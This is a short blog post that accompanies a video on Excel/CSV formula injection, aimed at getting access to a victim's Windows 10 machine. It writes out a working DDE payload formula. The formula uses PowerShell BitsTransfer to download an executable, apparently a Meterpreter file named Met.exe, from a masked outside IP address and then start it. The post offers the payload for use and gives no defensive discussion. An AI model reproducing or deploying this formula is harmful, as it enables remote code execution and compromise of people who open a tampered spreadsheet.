Excel Formula Injection

The video depicts about the CSV Injection attacks which was discovered by James Kettle. So this video is going to be about Excel formula injection and getting access of victim machine (Windows 10) with power shell Module BITS(Background Intelligence Transfer Service) Transfer for Malicious file transfer and starting the process.

The code written in the Excel sheet are:

=cmd| ‘/C powershell Import-Module BitsTransfer;Start-BitsTransfer -source hxxp://xx.xx.xx.xx/Met.exe;Start-Process Met.exe’ !A0

Mentioning the code since it’s not properly visible in the video.

#B31212Y

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s